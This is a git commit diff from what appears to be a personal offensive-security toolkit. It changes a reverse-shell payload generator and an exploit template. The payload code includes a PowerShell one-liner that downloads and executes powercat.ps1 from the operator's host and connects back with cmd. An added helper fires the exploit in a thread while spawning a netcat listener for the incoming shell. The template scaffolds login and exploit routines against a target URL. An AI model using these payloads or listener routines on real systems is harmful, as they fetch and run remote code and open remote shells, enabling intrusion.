Bugfixes
This commit is contained in:
parent
29d5f63c58
commit
1891efe2e4
@ -4,6 +4,8 @@ import socket
|
||||
import sys
|
||||
import pty
|
||||
import util
|
||||
import time
|
||||
import threading
|
||||
|
||||
def generatePayload(type, local_address, port):
|
||||
|
||||
@ -29,7 +31,11 @@ def generatePayload(type, local_address, port):
|
||||
return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port)
|
||||
|
||||
def triggerShell(func, port):
|
||||
def _wait_and_exec():
|
||||
time.sleep(1.5)
|
||||
func()
|
||||
|
||||
threading.Thread(target=_wait_and_exec).start()
|
||||
pty.spawn(["nc", "-lvvp", str(port)])
|
||||
|
||||
|
||||
|
11
template.py
11
template.py
@ -5,21 +5,23 @@ import sys
|
||||
def generateTemplate(baseUrl):
|
||||
template = """#!/usr/bin/env python
|
||||
|
||||
import requests
|
||||
import base64
|
||||
import sys
|
||||
import json
|
||||
import base64
|
||||
import requests
|
||||
from bs4 import BeautifulSoup
|
||||
from hackingscripts import util, fileserver
|
||||
|
||||
from urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
||||
|
||||
BASE_URL = "%s"
|
||||
BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
|
||||
|
||||
def login(username, password):
|
||||
# Template method to create a session
|
||||
session = requests.Session()
|
||||
post_data = { "username": username, "password": password }
|
||||
res = ression.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
|
||||
res = session.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
|
||||
if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
|
||||
print("Login failed")
|
||||
exit()
|
||||
@ -29,6 +31,7 @@ def exploit(session, payload):
|
||||
# Template method to exploit an endpoint
|
||||
pass
|
||||
|
||||
if __name__ == "__main__":
|
||||
session = login()
|
||||
exploit(session, "id")
|
||||
""" % baseUrl
|
||||
|
Loading…
Reference in New Issue
Block a user